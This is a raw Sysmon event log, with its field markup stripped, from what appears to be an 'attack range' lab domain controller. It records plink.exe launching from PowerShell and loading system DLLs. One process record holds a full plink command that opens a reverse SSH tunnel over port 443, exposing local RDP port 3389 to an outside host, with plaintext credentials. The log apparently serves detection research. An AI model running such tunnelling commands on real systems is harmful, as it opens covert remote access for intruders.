12241200x80000000000000007095900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000007095893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000007095892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000007095891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000007095889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValid 11241100x80000000000000007095865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.083{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007095864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000007095863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValid 734700x80000000000000007095862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000007095860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000007095859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000007095858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\combase.dll10.0.14393.5192 (rs1_release.220610-1622)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=336FBB55FF4D4E5A05343A51C98A8F74,SHA256=FD42EBCB39DD4311FA7515010FF4D08AC4DFF7D5C35FCB23207833ED4C2E8444trueMicrosoft WindowsValid 734700x80000000000000007095857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\windows.storage.dll10.0.14393.5291 (rs1_release.220806-1444)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=AA86B65DCB0ECF7263B863DE2A4E8D00,SHA256=2C4E0CA21438A610DCC55E24190146254E959DC5B8A0DE00BE517365CCCB10FBtrueMicrosoft WindowsValid 734700x80000000000000007095856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000007095855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\shell32.dll10.0.14393.5291 (rs1_release.220806-1444)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=D73641916AB4964C7FE9B4A37473A01B,SHA256=4BB60581FB93D73CDC4F1FBEA2DDACE5D16FE61B6E0E16622C326B6E2F407A7EtrueMicrosoft WindowsValid 734700x80000000000000007095854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValid 734700x80000000000000007095853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000007095852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x80000000000000007095851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x80000000000000007095850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000007095849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000007095848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000007095847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5291 (rs1_release.220806-1444)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=F8550606B41FF309D9A1DC76BB4EE875,SHA256=A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EBtrueMicrosoft WindowsValid 734700x80000000000000007095846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValid 734700x80000000000000007095845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000007095844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValid 734700x80000000000000007095843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValid 734700x80000000000000007095842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000007095841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000007095840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000007095839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.067{D271FDA4-5514-6323-F6FE-000000007402}6043876C:\Windows\system32\conhost.exe{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x80000000000000007095838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.066{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\KernelBase.dll10.0.14393.5246 (rs1_release.220701-1744)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=96EFBE3DB6300BB13E0720809302FF9F,SHA256=2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2FtrueMicrosoft WindowsValid 734700x80000000000000007095837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.050{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValid 734700x80000000000000007095836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.050{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValid 734700x80000000000000007095835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.050{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlinkMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAAtrueSimon TathamValid 10341000x80000000000000007095834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.050{D271FDA4-6B85-631B-7001-000000007402}41002724C:\Windows\system32\csrss.exe{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007095833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.050{D271FDA4-5514-6323-F5FE-000000007402}39961000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll+383fe6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4e00467(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b42834d0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b428310b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4d4b829(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b424007d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b42a3aef(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4285afe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4285afe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b428598f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b42766af(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4283bf1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4283763(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b42834d0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b428310b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4d4b829(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b42683b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll+b4267928(wow64) 154100x80000000000000007095832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.063{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlink"C:\Users\Administrator\Downloads\plink.exe" -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.comC:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA{D271FDA4-5514-6323-F5FE-000000007402}3996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 13241300x80000000000000007090946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\UsnQWORD (0x00000000-0x1383ac60) 13241300x80000000000000007090945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\LanguageDWORD (0x00000809) 13241300x80000000000000007090944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\SizeQWORD (0x00000000-0x000d1930) 13241300x80000000000000007090943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\AppxPackageRelativeId(Empty) 13241300x80000000000000007090942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\AppxPackageFullName(Empty) 13241300x80000000000000007090941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\BinProductVersion0.77.0.0 13241300x80000000000000007090940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 